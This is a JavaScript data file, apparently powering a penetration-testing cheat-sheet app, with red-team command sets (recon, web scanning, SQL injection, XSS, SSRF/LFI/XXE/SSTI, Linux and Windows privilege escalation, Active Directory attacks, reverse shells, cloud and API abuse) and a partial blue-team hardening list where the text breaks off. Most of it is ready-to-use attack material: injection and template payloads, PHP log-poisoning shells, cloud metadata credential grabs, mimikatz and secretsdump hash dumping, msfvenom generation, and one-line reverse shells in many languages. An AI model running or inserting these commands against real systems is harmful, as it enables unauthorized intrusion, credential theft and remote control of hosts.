const redTeamData = [
{cat:"Web Recon & Fuzzing",icn:"fa-binoculars",cmds:[
 {t:"Subfinder",d:"Passive subdomain enum",c:"subfinder -d {{TARGET}} -silent"},
 {t:"Amass Enum",d:"Deep subdomain extraction",c:"amass enum -passive -d {{TARGET}}"},
 {t:"Assetfinder",d:"Subdomain relational tool",c:"assetfinder --subs-only {{TARGET}}"},
 {t:"HTTPX Filter",d:"Live host verification",c:"cat subs.txt | httpx -silent"},
 {t:"WaybackUrls",d:"Extract Archive.org URLs",c:"echo {{TARGET}} | waybackurls"},
 {t:"GAU",d:"AlienVault generic search",c:"gau {{TARGET}}"},
 {t:"Katana Spider",d:"Headless JS crawling",c:"katana -u https://{{TARGET}} -jc"},
 {t:"Hakrawler",d:"Web endpoint crawler",c:"echo https://{{TARGET}} | hakrawler"},
 {t:"FFUF Dir Fuzz",d:"Common directory brute",c:"ffuf -w wordlist.txt -u https://{{TARGET}}/FUZZ"},
 {t:"Gobuster Dir",d:"Classic dir scan",c:"gobuster dir -u https://{{TARGET}} -w list.txt"},
 {t:"Feroxbuster",d:"Fast recursive rust scan",c:"feroxbuster -u https://{{TARGET}} -x js"},
 {t:"Dirsearch",d:"Automated extension fuzz",c:"dirsearch -u https://{{TARGET}}"},
 {t:"ParamSpider",d:"Find parameters explicitly",c:"paramspider -d {{TARGET}}"},
 {t:"Arjun",d:"HTTP Parameter discovery",c:"arjun -u https://{{TARGET}}/page"},
 {t:"Naabu Enum",d:"Fast reliable port scanner",c:"naabu -host {{TARGET}} -p -"},
 {t:"Nmap TCP All",d:"Full TCP sweep",c:"nmap -sS -p- -T4 {{TARGET}}"},
 {t:"RustScan",d:"Turbo port scanner",c:"rustscan -a {{TARGET}}"},
 {t:"Masscan",d:"Internet scale scanning",c:"masscan -p1-65535 {{TARGET}}"},
 {t:"Aquatone",d:"Screenshot web ports",c:"cat hosts.txt | aquatone"},
 {t:"Gowitness",d:"Chrome headless screenshot",c:"gowitness single https://{{TARGET}}"},
 {t:"WafW00f",d:"Identify WAF routing",c:"wafw00f https://{{TARGET}}"}
]},
{cat:"Web Vuln Scanning",icn:"fa-spider",cmds:[
 {t:"Nuclei Config",d:"Update templates",c:"nuclei -update-templates"},
 {t:"Nuclei (All)",d:"Run all templates",c:"nuclei -u https://{{TARGET}}"},
 {t:"Nuclei (Critical)",d:"High sev only",c:"nuclei -u https://{{TARGET}} -s critical,high"},
 {t:"Nuclei (CVEs)",d:"Run CVE checks only",c:"nuclei -u https://{{TARGET}} -t cves/"},
 {t:"Nuclei (Tokens)",d:"Check for exposed tokens",c:"nuclei -u https://{{TARGET}} -t exposed-panels/"},
 {t:"Nikto",d:"Classic web server sweep",c:"nikto -h https://{{TARGET}}"},
 {t:"Wapiti",d:"Blackbox web scanner",c:"wapiti -u https://{{TARGET}}"},
 {t:"Arachni",d:"Full featured Ruby scanner",c:"arachni https://{{TARGET}}"},
 {t:"WPScan (Basic)",d:"Iterative wordpress scan",c:"wpscan --url https://{{TARGET}}"},
 {t:"WPScan (Plugins)",d:"Enumerate weak plugins",c:"wpscan --url https://{{TARGET}} --enumerate p"},
 {t:"WPScan (Users)",d:"Enumerate WP users",c:"wpscan --url https://{{TARGET}} -e u"},
 {t:"Droopescan",d:"Scanner for Drupal",c:"droopescan scan drupal -u https://{{TARGET}}"},
 {t:"JoomScan",d:"Joomla automated scanner",c:"joomscan -u https://{{TARGET}}"},
 {t:"ZAP Baseline",d:"Headless baseline scan",c:"zap-cli baseline-scan https://{{TARGET}}"},
 {t:"ZAP Quick",d:"Headless quick active scan",c:"zap-cli quick-scan https://{{TARGET}}"},
 {t:"Gitleaks",d:"Find exposed secrets",c:"gitleaks detect -v"},
 {t:"SecretFinder",d:"JS secret parsing",c:"python3 SecretFinder.py -i https://{{TARGET}}/app.js"},
 {t:"TruffleHog",d:"Scan git for secrets",c:"trufflehog --regex https://github.com/{{TARGET}}"},
 {t:"Corsy",d:"CORS misconfiguration",c:"python3 corsy.py -u https://{{TARGET}}"},
 {t:"Dalfox (Auto)",d:"Blind XSS sweeping",c:"dalfox url https://{{TARGET}}"},
 {t:"CMSmap",d:"Automated CMS finding",c:"cmsmap https://{{TARGET}}"}
]},
{cat:"SQL Injection (SQLi)",icn:"fa-database",cmds:[
 {t:"SQLmap Wizard",d:"Automated wizard menu",c:"sqlmap --wizard -u \"https://{{TARGET}}\""},
 {t:"SQLmap Basic Check",d:"Standard GET parameter",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --batch"},
 {t:"SQLmap Forms",d:"Automatically parse forms",c:"sqlmap -u \"https://{{TARGET}}\" --forms"},
 {t:"SQLmap POST req",d:"Inject POST body data",c:"sqlmap -u \"https://{{TARGET}}/login\" --data=\"user=a&pass=b\""},
 {t:"SQLmap Headers",d:"Inject HTTP Headers",c:"sqlmap -u \"https://{{TARGET}}\" -H \"User-Agent: *\""},
 {t:"SQLmap Level/Risk",d:"Intense payload delivery",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --level=5 --risk=3"},
 {t:"SQLmap Tampers",d:"Load WAF bypass tampers",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --tamper=\"space2comment\""},
 {t:"SQLmap Time-based",d:"Force boolean/time tech",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --technique=T"},
 {t:"SQLmap Dump All",d:"Extract DB completely",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --dump-all"},
 {t:"SQLmap Passwords",d:"Dump stored hashes",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --passwords"},
 {t:"SQLmap OS Shell",d:"Drop a web shell payload",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --os-shell"},
 {t:"SQLmap File Read",d:"Read file off OS",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --file-read=\"/etc/passwd\""},
 {t:"SQLmap File Write",d:"Write file to OS",c:"sqlmap -u \"https://{{TARGET}}/page?id=1\" --file-write=\"shell.php\""},
 {t:"NoSQLMap",d:"Automated NoSQL expl",c:"nosqlmap --url https://{{TARGET}}"},
 {t:"Ghauri",d:"Advanced SQLi injection tool",c:"ghauri -u \"https://{{TARGET}}/page?id=1\" --dbs"},
 {t:"Auth Bypass (admin)",d:"Classic Auth OR string",c:"' OR 1=1 --"},
 {t:"Auth Bypass (hash)",d:"MySQL hashtag bypass",c:"admin' #"},
 {t:"Blind Boolean Test",d:"Test true response",c:"id=1' AND 1=1-- -"},
 {t:"Blind False Test",d:"Test false response",c:"id=1' AND 1=2-- -"},
 {t:"Postgres Wait",d:"pg_sleep check",c:"1'; SELECT pg_sleep(5)--"},
 {t:"MSSQL Wait",d:"WAITFOR check",c:"1'; WAITFOR DELAY '0:0:5'--"}
]},
{cat:"Cross-Site Scripting (XSS)",icn:"fa-code",cmds:[
 {t:"Dalfox URL mode",d:"Test single query val",c:"dalfox url https://{{TARGET}}/?q=test"},
 {t:"Dalfox File mode",d:"Mass XSS test on list",c:"dalfox file urls.txt"},
 {t:"Dalfox Blind Mode",d:"Inject XSS Hunter code",c:"dalfox url https://{{TARGET}} -b YOUR_PAYLOAD"},
 {t:"XSStrike",d:"Smart heuristic payload gen",c:"python3 xsstrike.py -u \"https://{{TARGET}}/?q=test\""},
 {t:"XSSer",d:"Mass framework for XSS",c:"xsser --url \"https://{{TARGET}}/?q=\""},
 {t:"Kxss",d:"Identify reflected chars",c:"cat urls.txt | kxss"},
 {t:"Polyglot Payload",d:"Multi-context bypass string",c:"jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e"},
 {t:"FFUF XSS Fuzz",d:"Fuzz for unfiltered chars",c:"ffuf -w payloads.txt -u \"https://{{TARGET}}/?q=FUZZ\""},
 {t:"Script Tag Escape",d:"Basic tag breakout",c:"</script><script>alert(1)</script>"},
 {t:"Image Error Event",d:"No-script execution",c:"<img src=x onerror=alert(1)>"},
 {t:"SVG OnLoad Event",d:"Bypass input filters",c:"<svg onload=alert(1)>"},
 {t:"Body OnLoad Event",d:"Inject into DOM body",c:"<body onload=alert(1)>"},
 {t:"Iframe Injection",d:"Load malicious script",c:"<iframe src=\"javascript:alert(1)\">"},
 {t:"Anchor Javascript",d:"HREF link execution",c:"<a href=\"javascript:alert(1)\">Click</a>"},
 {t:"AngularJS Template",d:"SSTI / XSS bypass",c:"{{constructor.constructor('alert(1)')()}}"},
 {t:"VueJS Template",d:"Client-side template inject",c:"{{_toConsumableArray.constructor('alert(1)')()}}"},
 {t:"Bypass: No Quotes",d:"Execute without string quotes",c:"<script>alert(String.fromCharCode(88,83,83))</script>"},
 {t:"Bypass: HTML Encode",d:"Use HTML encoding",c:"<svg/onload=&#97;&#108;&#101;&#114;&#116;(1)>"},
 {t:"Bypass: Case Insens.",d:"Mix cases to bypass checks",c:"<sCrIpT>alert(1)</ScRiPt>"},
 {t:"DOM XSS check",d:"Ripgrep for JS sinks",c:"rg -i 'innerHTML|document\\.write|eval' /js/"},
 {t:"Content-Security",d:"Check headers for bypass",c:"curl -I https://{{TARGET}} | grep -i CSP"}
]},
{cat:"SSRF & LFI",icn:"fa-file-code",cmds:[
 {t:"FFUF LFI Fuzz",d:"Discover local files via args",c:"ffuf -w lfi-wordlist.txt -u \"https://{{TARGET}}/?file=FUZZ\""},
 {t:"Linux Passwd file",d:"Extract user list",c:"../../../../etc/passwd"},
 {t:"Linux Shadow file",d:"Extract password hashes",c:"../../../../etc/shadow"},
 {t:"PHP Filter Base64",d:"Leak source code",c:"php://filter/read=convert.base64-encode/resource=index.php"},
 {t:"PHP Input Wrapper",d:"RCE via request body",c:"php://input"},
 {t:"PHP Expect Wrapper",d:"RCE via shell execution",c:"expect://id"},
 {t:"Windows WIN.ini",d:"Verify Windows LFI",c:"..\\..\\..\\..\\Windows\\win.ini"},
 {t:"Log Poisoning (Auth)",d:"Inject code to SSH log",c:"ssh '<?php system($_GET[\"cmd\"]);?>'@{{TARGET}}"},
 {t:"Log Poisoning (Web)",d:"Inject code via User-Agent",c:"curl -A \"<?php system($_GET['c']); ?>\" https://{{TARGET}}"},
 {t:"SSRF Localhost Port",d:"Scan internal network",c:"ffuf -w ports.txt -u \"https://{{TARGET}}/?url=http://127.0.0.1:FUZZ\""},
 {t:"SSRF AWS Meta-Data",d:"Grab AWS creds",c:"curl \"https://{{TARGET}}/?url=http://169.254.169.254/latest/meta-data/iam/\""},
 {t:"SSRF GCP Meta-Data",d:"Grab GCP creds",c:"curl -H \"Metadata-Flavor: Google\" \"https://{{TARGET}}/?url=http://metadata...\""},
 {t:"SSRF Azure Tokens",d:"Grab Azure creds",c:"curl \"https://{{TARGET}}/?url=http://169.254.169.254/metadata/identity/oauth2/token\""},
 {t:"SSRF via Gopher",d:"Talk to Redis/MySQL",c:"gopher://127.0.0.1:3306/_..."},
 {t:"XXE Read File",d:"Ext. Entity local file",c:"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"},
 {t:"XXE OOB Data Leak",d:"Extract data via DNS/HTTP",c:"<!ENTITY xxe SYSTEM \"http://YOUR_VPS/?d=%data;\">"},
 {t:"SSTI Jinja2 RCE",d:"RCE via Python Jinja",c:"{{ ''.__class__.__mro__[1].__subclasses__()[400]... }}"},
 {t:"SSTI Java FreeMarker",d:"RCE via Java Template",c:"<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }"},
 {t:"SSTI Twig RCE",d:"RCE via PHP Twig",c:"{{['id']|filter('system')}}"},
 {t:"SSTI Ruby RCE",d:"RCE via ERB",c:"<%= `id` %>"},
 {t:"Path Traversal URL",d:"Bypass filter with encoding",c:"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"}
]},
{cat:"Privilege Escalation (Linux)",icn:"fa-linux",cmds:[
 {t:"LinPEAS Download",d:"Grab fast enueration script",c:"curl -L https://github.com/carlospolop/PEASS-ng/.../linpeas.sh > linpeas.sh"},
 {t:"LinPEAS Execute",d:"Run enum script cleanly",c:"sh linpeas.sh -a > output.txt"},
 {t:"Check Sudo Rights",d:"See allowed sudo commands",c:"sudo -l"},
 {t:"Sudo Bypass (ALL)",d:"Spawns root shell if NOPASS",c:"sudo su"},
 {t:"Find SUID Binaries",d:"Locate SUID executable files",c:"find / -type f -perm -04000 2>/dev/null"},
 {t:"Find SGID Binaries",d:"Locate SGID files",c:"find / -type f -perm -02000 2>/dev/null"},
 {t:"Check Crontab",d:"List scheduled root tasks",c:"cat /etc/crontab"},
 {t:"User Crontabs",d:"Check user specific tasks",c:"ls -la /var/spool/cron/crontabs/"},
 {t:"Writable System Files",d:"Find global writable files",c:"find / -type f -maxdepth 3 -writable 2>/dev/null"},
 {t:"Check Capabilities",d:"Investigate file capabilities",c:"getcap -r / 2>/dev/null"},
 {t:"Tar Wildcard PE",d:"Exploit loose tar tasks",c:"echo \"\" > --checkpoint-action=exec=sh shell.sh"},
 {t:"Docker Group Escape",d:"Break out into host FS",c:"docker run -v /:/mnt --rm -it alpine chroot /mnt sh"},
 {t:"LXC Container Escape",d:"Mount host via LXC admin",c:"lxc-start -n myContainer"},
 {t:"Path Hijacking",d:"Replace local script binary",c:"echo '/bin/sh' > /tmp/ls; export PATH=/tmp:$PATH"},
 {t:"LD_PRELOAD PE",d:"Exploit env_keep in sudo",c:"gcc -fPIC -shared -o pe.so pe.c; sudo LD_PRELOAD=pe.so id"},
 {t:"Polkit Exploit",d:"PwnKit specific PE execution",c:"./cve-2021-4034"},
 {t:"Screen PE",d:"CVE-2017-5618 Screen Exploit",c:"./screen_exploit.sh"},
 {t:"Find plaintext pass",d:"Search for password strings",c:"grep -rnw '/etc/' -e 'password'"},
 {t:"SSH Key Hunt",d:"Search for valid private keys",c:"find / -name id_rsa 2>/dev/null"},
 {t:"Wget Writable File",d:"Use wget wrapper for PE",c:"wget http://{{TARGET}}/file -O /etc/shadow"},
 {t:"GTFOBins searcher",d:"Check binary in GTFOBins",c:"curl -s https://gtfobins.github.io/ | grep 'binary'"}
]},
{cat:"Privilege Escalation (Windows)",icn:"fa-windows",cmds:[
 {t:"WinPEAS Download",d:"Grab Windows enum script",c:"certutil.exe -urlcache -split -f http://IP/winpeas.exe"},
 {t:"WinPEAS Execute",d:"Run silent check",c:"winPEASany.exe quiet cmd fast"},
 {t:"Check Privileges",d:"Whoami privileges",c:"whoami /priv"},
 {t:"List Local Users",d:"Enum user domain completely",c:"net user"},
 {t:"List Local Admins",d:"Who is in admin group",c:"net localgroup administrators"},
 {t:"System Info",d:"Check OS patching version",c:"systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\""},
 {t:"Unquoted Service Path",d:"Auto-find weak services",c:"wmic service get name,displayname,pathname,startmode | findstr /i \"auto\""},
 {t:"Modifiable Services",d:"Check ACLs of services with accesschk",c:"accesschk.exe -uwcqv \"Authenticated Users\" *"},
 {t:"AlwaysInstallElevated",d:"Check MSI abuse capability",c:"reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"},
 {t:"SAM/SYSTEM Backup",d:"Check for Registry hive backups",c:"dir C:\\Windows\\repair\\SAM"},
 {t:"Dump SAM hashes",d:"Extract from hive via Impacket",c:"secretsdump.py -sam SAM -system SYSTEM LOCAL"},
 {t:"Juicy Potato",d:"SeImpersonate Privilege exploit",c:"JuicyPotato.exe -l 1337 -p cmd.exe -a \"/c rev.exe\" -t * "},
 {t:"PrintSpoofer",d:"Modern SeImpersonate exploit",c:"PrintSpoofer.exe -i -c cmd"},
 {t:"RougePotato",d:"Bypass Win10 impersonate fix",c:"RoguePotato.exe -r 10.0.0.1 -e \"cmd.exe\""},
 {t:"Check Scheduled Tasks",d:"Check for writable executions",c:"schtasks /query /fo LIST /v"},
 {t:"Check WSL",d:"Exploit WSL instance config",c:"wsl.exe whoami"},
 {t:"Password in Files",d:"Search configs for cleartext",c:"findstr /si password *.xml *.ini *.txt"},
 {t:"PowerUp Check All",d:"Run PowerSploit local checks",c:"Invoke-AllChecks"},
 {t:"Bypass Execution Policy",d:"Disable PS script blocking",c:"powershell -ep bypass"},
 {t:"Registry AutoRun",d:"Check login execution hooks",c:"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
 {t:"AppLocker Policy",d:"View local AppLocker scope",c:"Get-AppLockerPolicy -Effective"}
]},
{cat:"Active Directory Exploitation",icn:"fa-landmark",cmds:[
 {t:"Kerbrute Enum",d:"Validate AD usernames lists",c:"kerbrute userenum -d domain.com users.txt"},
 {t:"AS-REP Roasting",d:"Impacket GetNPUsers",c:"GetNPUsers.py domain.com/ -usersfile users.txt -format hashcat"},
 {t:"Kerberoasting",d:"Impacket GetUserSPNs",c:"GetUserSPNs.py domain.com/user:pass -request"},
 {t:"Rubeus AS-REP",d:"Roast with Rubeus natively",c:"Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt"},
 {t:"Rubeus Kerberoast",d:"Roast SPNs with Rubeus",c:"Rubeus.exe kerberoast /outfile:hashes.txt"},
 {t:"CrackMapExec SMB",d:"Test creds across subnet",c:"crackmapexec smb {{TARGET}}/24 -u user -p pass"},
 {t:"CrackMapExec Shares",d:"Hunt for open file shares",c:"crackmapexec smb {{TARGET}}/24 -u user -p pass --shares"},
 {t:"BloodHound Ingestor",d:"Map entire AD relationship",c:"SharpHound.exe -c All"},
 {t:"SecretsDump DC",d:"Dump NTDS.dit hashes via DRSUAPI",c:"secretsdump.py domain.com/admin:pass@{{TARGET}}"},
 {t:"Pass-The-Hash",d:"Authenticate with NTLM",c:"crackmapexec smb {{TARGET}} -u admin -H NTLMHASH --local-auth"},
 {t:"Pass-The-Ticket",d:"Use TGT (.kirbi) to access",c:"Rubeus.exe ptt /ticket:ticket.kirbi"},
 {t:"Responder Capture",d:"Listen for LLMNR NTLMv2",c:"responder -I eth0"},
 {t:"NTLM Relayx",d:"Relay NTLMv2 to SMB/LDAP",c:"ntlmrelayx.py -t smb://{{TARGET}}"},
 {t:"PetitPotam",d:"Coerce DC authentication",c:"PetitPotam.exe ATTACKER_IP {{TARGET}}"},
 {t:"Certipy Enum",d:"Find weak ADCS certificates",c:"certipy req -u user -p pass -target {{TARGET}}"},
 {t:"ShadowCreds",d:"Exploit KeyCredentialLink",c:"Whisker.exe add /target:DC01$ /domain:domain.com"},
 {t:"Silver Ticket",d:"Forge TGS for specific service",c:"ticketer.py -nthash HASH -domain-sid SID -domain domain.com user"},
 {t:"Golden Ticket",d:"Forge domain-admin TGT",c:"mimikatz.exe \"kerberos::golden\""},
 {t:"DCSync Attack",d:"Simulate DC to pull password",c:"mimikatz.exe \"lsadump::dcsync /domain:domain.com /all\""},
 {t:"Zerologon Check",d:"Test for CVE-2020-1472",c:"zerologon_tester.py DC01 {{TARGET}}"},
 {t:"NoPac Exploit",d:"Check SamAccountName spoofing",c:"noPac.py domain.com/user:pass -dc-ip {{TARGET}}"}
]},
{cat:"Reverse Shells & Payloads",icn:"fa-terminal",cmds:[
 {t:"Bash TCP Shell",d:"Standard interactive bash pipe",c:"bash -i >& /dev/tcp/{{TARGET}}/4444 0>&1"},
 {t:"Netcat Shell",d:"Traditional nc execution",c:"nc -e /bin/sh {{TARGET}} 4444"},
 {t:"Netcat OpenBSD",d:"NC without -e flag",c:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{TARGET}} 4444 >/tmp/f"},
 {t:"Python3 Shell",d:"Python single-liner shell",c:"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{{TARGET}}\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'"},
 {t:"Perl Shell",d:"Perl standard module shell",c:"perl -e 'use Socket;$i=\"{{TARGET}}\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"},
 {t:"PHP Shell",d:"PHP CLI sock shell",c:"php -r '$sock=fsockopen(\"{{TARGET}}\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"},
 {t:"Ruby Shell",d:"Ruby built-in shell",c:"ruby -rsocket -e'f=TCPSocket.open(\"{{TARGET}}\",4444).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"},
 {t:"Golang Shell",d:"Echo Go reverse template",c:"echo '...' > shell.go && go run shell.go"},
 {t:"Awk Shell",d:"Bypass with Awk syntax",c:"awk 'BEGIN {s = \"/inet/tcp/0/{{TARGET}}/4444\"; while(42) { do{ printf \"shell> \" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"},
 {t:"Java Shell",d:"Java execution standard string",c:"Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{{TARGET}}/4444 0>&1\");"},
 {t:"PowerShell Shell",d:"PS standard socket loop",c:"$client = New-Object System.Net.Sockets.TCPClient(\"{{TARGET}}\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"},
 {t:"Socat Bind",d:"Listen on target directly",c:"socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane"},
 {t:"Socat Reverse",d:"Connect back with socat",c:"socat TCP:{{TARGET}}:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane"},
 {t:"Metasploit Win",d:"Generate MSF venom PE",c:"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{TARGET}} LPORT=4444 -f exe -o rev.exe"},
 {t:"Metasploit Lin",d:"Generate MSF venom ELF",c:"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{TARGET}} LPORT=4444 -f elf -o rev.elf"},
 {t:"Metasploit PHP",d:"Raw PHP meterpreter",c:"msfvenom -p php/meterpreter_reverse_tcp LHOST={{TARGET}} LPORT=4444 -f raw > shell.php"},
 {t:"Metasploit ASPX",d:"IIS MSF shell",c:"msfvenom -p windows/meterpreter/reverse_tcp LHOST={{TARGET}} LPORT=4444 -f aspx -o shell.aspx"},
 {t:"Ngrok Listener",d:"Tunnel local listener",c:"ngrok tcp 4444"},
 {t:"Listen TCP",d:"Standard netcat listener",c:"nc -lvnp 4444"},
 {t:"Listen Socat",d:"Socat TTY listener",c:"socat file:`tty`,raw,echo=0 tcp-listen:4444"},
 {t:"Upgrade TTY (Py)",d:"Stabilize dummy shell",c:"python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"}
]},
{cat:"Cloud & APIs",icn:"fa-cloud",cmds:[
 {t:"Nmap Cloud Enum",d:"Check AWS/GCP/Azure storage",c:"cloud_enum -k keyword -m /wordlists/mutations.txt"},
 {t:"AWS Caller ID",d:"Confirm credentials",c:"aws sts get-caller-identity"},
 {t:"AWS List Buckets",d:"Enumerate objects",c:"aws s3 ls"},
 {t:"AWS Sync Bucket",d:"Download entire bucket data",c:"aws s3 sync s3://bucket-name ./"},
 {t:"AWS IAM Users",d:"List all IAM accounts",c:"aws iam list-users"},
 {t:"AWS Enum Pacu",d:"Run Pacu suite",c:"pacu -c 'run aws__enum_account'"},
 {t:"GCP Auth",d:"Login via token CLI",c:"gcloud auth login"},
 {t:"GCP List VM",d:"List instances running",c:"gcloud compute instances list"},
 {t:"GCP IAM Enum",d:"View policy binds",c:"gcloud projects get-iam-policy {{TARGET}}"},
 {t:"Microburst Azure",d:"Invoke blob discovery",c:"Invoke-AzureRMBlobRecon -Tenant {{TARGET}}"},
 {t:"Kiterunner",d:"Fast API endpoint brute",c:"kr scan https://{{TARGET}}/api/ -w routes.txt"},
 {t:"Postman to Burp",d:"Proxy API queries",c:"curl -x 127.0.0.1:8080 -H \"Auth: Bearer\" https://{{TARGET}}/api"},
 {t:"JWT Decode",d:"Decode token base64",c:"jwt_tool.py {{TARGET}}"},
 {t:"JWT Alg None",d:"Forge token with logic flaw",c:"jwt_tool.py {{TARGET}} -I -hc NONE"},
 {t:"JWT Crack",d:"Bruteforce signing secret",c:"hashcat -m 16500 jwt.txt wordlist.txt"},
 {t:"GraphQL Introspection",d:"Dump schema map",c:"curl -X POST -d '{\"query\": \"{__schema{types{name}}}\"}' https://{{TARGET}}/graphql"},
 {t:"GraphQL Clairvoyance",d:"Bruteforce disabled schema",c:"python3 clairvoyance.py -w words.txt https://{{TARGET}}/graphql"},
 {t:"Inql (GraphQL)",d:"Automated pentest util",c:"inql -t https://{{TARGET}}/graphql"},
 {t:"Firebase DB",d:"Check public JSON write",c:"curl -X PUT -d '{\"test\":1}' https://{{TARGET}}.firebaseio.com/test.json"},
 {t:"Docker API Enum",d:"Target exposed 2375 port",c:"curl -s http://{{TARGET}}:2375/containers/json"},
 {t:"Kubernetes API",d:"List secrets",c:"curl -s -k -H \"Authorization: Bearer $TOKEN\" https://{{TARGET}}:6443/api/v1/secrets"}
]}
];

const blueTeamData = [
{cat:"Incident Response & Hunting",icn:"fa-tower-broadcast",cmds:[
 {t:"Netstat Full",d:"Ports with PIDs (Windows)",c:"netstat -anob"},
 {t:"Linux SS Enum",d:"Sockets with processes",c:"ss -tupan"},
 {t:"TCPDump Capture",d:"Full packet trace",c:"tcpdump -i eth0 -w file.pcap"},
 {t:"PSList Memory",d:"List Volatility Processes",c:"volatility -f mem.raw --profile=Win7SP1x64 pslist"},
 {t:"Process Dump",d:"Dump malware RAM config",c:"procdump.exe -ma <PID> dump.dmp"},
 {t:"Sysinternals Autoruns",d:"Scan startup persistence",c:"autorunsc.exe -a *"},
 {t:"List DLLs",d:"List loaded process modules",c:"listdlls.exe <PID>"},
 {t:"Handle Lookup",d:"See open file locks",c:"handle.exe -p <PID>"},
 {t:"Isolate Network",d:"Drop all traffic except AV",c:"netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound"},
 {t:"Zeek Summary",d:"Parse PCAP into logs",c:"zeek -C -r capture.pcap"},
 {t:"Snort Realtime",d:"Run IDS alert console",c:"snort -c /etc/snort/snort.conf -i eth0 -A console"},
 {t:"Suricata JSON",d:"Parse Eve.json events",c:"cat eve.json | jq '.'"},
 {t:"Wireshark Filter",d:"Tshark for HTTP only",c:"tshark -r capture.pcap -Y \"http.request.method == POST\""},
 {t:"Suspend Malware",d:"Freeze process safely",c:"pssuspend.exe <PID>"},
 {t:"Kill Process Tree",d:"Destroy malware completely",c:"taskkill /F /T /PID <PID>"},
 {t:"Linux Find Modified",d:"Binaries changed in 1 day",c:"find / -mtime -1 -type f"},
 {t:"Linux Find Hidden",d:"Discover hidden files",c:"find /tmp -name \".*\""},
 {t:"Linux Check SUID",d:"Look for backdoor bits",c:"find / -perm -4000"},
 {t:"UFW Block IP",d:"Drop malicious actor",c:"ufw deny from {{TARGET}}"},
 {t:"Check Scheduled Tasks",d:"Identify persistence",c:"schtasks /query /fo LIST /v"},
 {t:"Defender Scan",d:"Launch quick CLI scan",c:"Start-MpScan -ScanType QuickScan"}
]},
{cat:"System Hardening & Config",icn:"fa-shield-heart",cmds:[
 {t:"Disable Root SSH",d:"Prevent root login",c:"sed -i 's/PermitRootLogin yes/PermitRootLogin no/g' /etc/ssh/sshd_config"},
 {t:"Restart SSHD",d:"Apply ssh configs",c:"systemctl restart sshd"},
 {t:"UFW Enable",d:"Turn on generic firewall",c:"ufw enable"},
 {t:"UFW Default Deny",d:"Reject incoming generically",c:"ufw default deny incoming"},
 {t:"Enable AppArmor",d:"Enforce kernel protections",c:"aa-enforce /etc/apparmor.d/*"},
 {t:"Auditd Watch File",d:"Log /etc/passwd modifications",c:"auditctl -w /etc/passwd -p wa -k passwd_mod"},
 {t:"Secure Shared Mem",d:"Prevent execution in /dev/shm",c:"mount -o remount,noexec,nosuid /dev/shm"},
 {t:"Windows Defender On",d:"Ensure AV isn't disabled",c:"Set-MpPreference -DisableRealtimeMonitoring $false"},
 {t:"Disable SMBv1",d:"Kill EternalBlue vector",c:"Set-SmbServerConfiguration -EnableSMB1Protocol $false"},
 {t:"Enable PUA Block",d:"Block potentially unwanted",c:"Set-MpPreference -PUAProtection Enabled"},
 {t:"Ransomware Folders",d:"Turn on controlled folders",c:"Set-MpPreference -EnableControlledFolderAccess Enabled"},
 {t:"Lock Linux User",d:"Freeze compromised user",c:"passwd -l <user>"},
 {t:"Unlock Linux User",d:"Re-enable account",c:"passwd -u <user>"},
 {t:"Disable Windows Guest",d:"Harden local accounts",c:"net user guest /active:no"},
 {t:"Audit Logon Policy",d:"Enable AD Logon tracking",c:"auditpol /set /subcategory:\"Logon\" /success:enable /failure:enable"},
 {t:"Password Complexity",d:"Enforce win requirements",c:"net accounts /maxpwage:30 /minpwlen:12"},
 {t:"Check Sudoers",d:"Verify NO NOPASSWD",c:"visudo -c"},
 {t:"Limit Cron Access",d:"Only allow specific users",c:"echo root > /etc/cron.allow"},
 {t:"Disable USB Mass",d:"Kill USB storage mounting",c:"echo 'install usb-storage /bin/true' >> /etc/modprobe.d/disable-usb.conf"},
 {t:"Remove EXEs from AppData",d:"AppLocker standard rule",c:"Get-AppLockerPolicy -Effective"},
